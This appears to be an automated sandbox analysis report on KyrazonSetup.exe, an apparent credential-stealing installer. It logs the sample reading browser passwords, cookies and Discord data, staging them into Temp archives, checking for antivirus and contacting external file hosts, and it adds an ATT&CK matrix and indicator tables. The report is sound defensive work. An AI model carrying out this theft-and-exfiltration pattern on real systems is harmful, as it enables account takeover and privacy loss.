Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Applications VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Discord Tokens VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Microsoft_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Passwords\Google_Default.txt VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Roaming\KyrazonGodot\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\package.json VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\windows-shortcuts.js VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\CURQNKVOIX.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\DVWHKMNFNN.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\KATAXZVCPS.mp3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\KATAXZVCPS.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\NIKHQAIQAU.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\ONBQCLYSPU.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\UMMBDNEQBN.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\XZXHAVGRAG.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\YPSIACHYXW.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\YPSIACHYXW.pdf VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Downloads\desktop.ini VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\DTBZGIOOSO VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\DVWHKMNFNN.xlsx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Music VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\NIKHQAIQAU.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\NWTVCDUMOB.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\XZXHAVGRAG.docx VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW.jpg VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.png VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3 VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Applications VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Browser Extensions VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Microsoft_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Wallets VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Applications VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Applications VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Discord Tokens VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Microsoft_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Passwords\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Tries to steal communication platform credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordCanaryJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordPTBJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordDevelopmentJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\Discord
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordCanary
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordPTB
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exefile Attributes Queried: C:\Users\user\AppData\Local\DiscordDevelopment
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeDirectory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		13
File and Directory Discovery		Remote Services1
Archive Collected Data		12
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
Windows Service		1
Access Token Manipulation		2
Obfuscated Files or Information		LSASS Memory46
System Information Discovery		Remote Desktop Protocol11
Data from Local System		2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter		2
Registry Run Keys / Startup Folder		1
Windows Service		1
DLL Side-Loading		Security Account Manager21
Security Software Discovery		SMB/Windows Admin Shares1
Email Collection		3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Process Injection		11
Masquerading		NTDS1
Virtualization/Sandbox Evasion		Distributed Component Object Model1
Clipboard Data		Protocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
Registry Run Keys / Startup Folder		1
Virtualization/Sandbox Evasion		LSA Secrets2
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Access Token Manipulation		Cached Domain Credentials1
Remote System Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Process Injection		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1489101 Sample: KyrazonSetup.exe Startdate: 06/08/2024 Architecture: WINDOWS Score: 60 87 zerostone.discloud.app 2->87 89 tempfile.me 2->89 91 4 other IPs or domains 2->91 103 Sigma detected: Invoke-Obfuscation CLIP+ Launcher 2->103 105 Sigma detected: Invoke-Obfuscation VAR+ Launcher 2->105 9 KyrazonGodot.exe 17 2->9         started        14 KyrazonGodot.exe 2->14         started        16 KyrazonSetup.exe 12 225 2->16         started        signatures3 process4 dnsIp5 93 api.gofile.io 51.38.43.18, 443, 49542, 49549 OVHFR France 9->93 95 92.246.138.20, 49539, 49543, 80 MEGAMAX-ASNizhnyNovgorodRU Russian Federation 9->95 97 4 other IPs or domains 9->97 71 826b8686-c1e5-48d8...caf060804a.tmp.node, PE32+ 9->71 dropped 73 5ec3d08a-7ef2-4ee9...f225a068c8.tmp.node, PE32+ 9->73 dropped 107 Tries to steal communication platform credentials (via file / registry access) 9->107 18 cmd.exe 9->18         started        20 cmd.exe 9->20         started        22 cmd.exe 9->22         started        33 28 other processes 9->33 75 aad38a22-07e7-47f5...babbf006a9.tmp.node, PE32+ 14->75 dropped 77 2714d126-6dff-4bf4...5695222b09.tmp.node, PE32+ 14->77 dropped 109 Tries to harvest and steal browser information (history, passwords, etc) 14->109 24 cmd.exe 14->24         started        26 cmd.exe 14->26         started        28 KyrazonGodot.exe 14->28         started        35 14 other processes 14->35 79 C:\Users\user\AppData\...\KyrazonGodot.exe, PE32+ 16->79 dropped 81 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 16->81 dropped 83 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 16->83 dropped 85 14 other files (none is malicious) 16->85 dropped 111 Drops large PE files 16->111 31 cmd.exe 1 16->31         started        file6 signatures7 process8 dnsIp9 41 2 other processes 18->41 43 2 other processes 20->43 37 tasklist.exe 22->37         started        39 conhost.exe 22->39         started        45 3 other processes 24->45 47 2 other processes 26->47 99 162.159.61.3, 443, 49537, 60931 CLOUDFLARENETUS United States 28->99 49 3 other processes 31->49 101 chrome.cloudflare-dns.com 172.64.41.3, 443, 49535, 59553 CLOUDFLARENETUS United States 33->101 51 36 other processes 33->51 53 18 other processes 35->53 process10 process11 55 Conhost.exe 37->55         started        57 Conhost.exe 41->57         started        59 Conhost.exe 41->59         started        61 Conhost.exe 43->61         started        63 Conhost.exe 43->63         started        65 Conhost.exe 51->65         started        67 Conhost.exe 51->67         started        69 Conhost.exe 51->69         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
KyrazonSetup.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe0%ReversingLabs
C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Programs\KyrazonGodot\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node4%ReversingLabs
C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node4%ReversingLabs
C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node0%ReversingLabs
C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\KyrazonGodot.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://support.google.com/chrome/answer/60988690%URL Reputationsafe
https://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
https://chromium.googlesource.com/chromium/src/0%URL Reputationsafe
https://www.apache.org/licenses/0%URL Reputationsafe
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
https://blueimp.net0%URL Reputationsafe
http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
https://opensource.org/licenses/MIT0%URL Reputationsafe
http://webkit.org/0%Avira URL Cloudsafe
https://github.com/simplejson/simplejson0%Avira URL Cloudsafe
https://chromium.googlesource.com/vulkan-deps/0%Avira URL Cloudsafe
https://github.com/Squirrel/Squirrel.Mac0%Avira URL Cloudsafe
https://github.com/google/ukey20%Avira URL Cloudsafe
http://eksempel.dk0%Avira URL Cloudsafe
https://github.com/KhronosGroup/SPIRV-Tools.git0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://support.google.com/chrome/answer/6098869?hl=es0%Avira URL Cloudsafe
https://github.com/iarna/wide-align0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=ja&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
http://www.freedesktop.org/wiki/Software/xdg-user-dirs0%Avira URL Cloudsafe
http://code.google.com/p/smhasher/0%Avira URL Cloudsafe
http://docs.python.org/library/uuid.html0%Avira URL Cloudsafe
http://92.246.138.20/storage0%Avira URL Cloudsafe
http://tukaani.org/xz/0%Avira URL Cloudsafe
https://github.com/sponsors/ctavan0%Avira URL Cloudsafe
https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=pl&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
http://www.linux-usb.org/usb-ids.html0%Avira URL Cloudsafe
https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp0%Avira URL Cloudsafe
https://skia.org/0%Avira URL Cloudsafe
https://github.com/google/diff-match-patch/tree/master/javascript0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=sk&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
http://opensource.perlig.de/rjsmin/0%Avira URL Cloudsafe
https://passwords.google.com0%Avira URL Cloudsafe
https://android.googlesource.com/platform/external/puffin0%Avira URL Cloudsafe
https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%220%Avira URL Cloudsafe
https://github.com/google/pprof/tree/master/proto0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=ur&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
http://www.movable-type.co.uk/scripts/sha1.html0%Avira URL Cloudsafe
http://blog.izs.me)0%Avira URL Cloudsafe
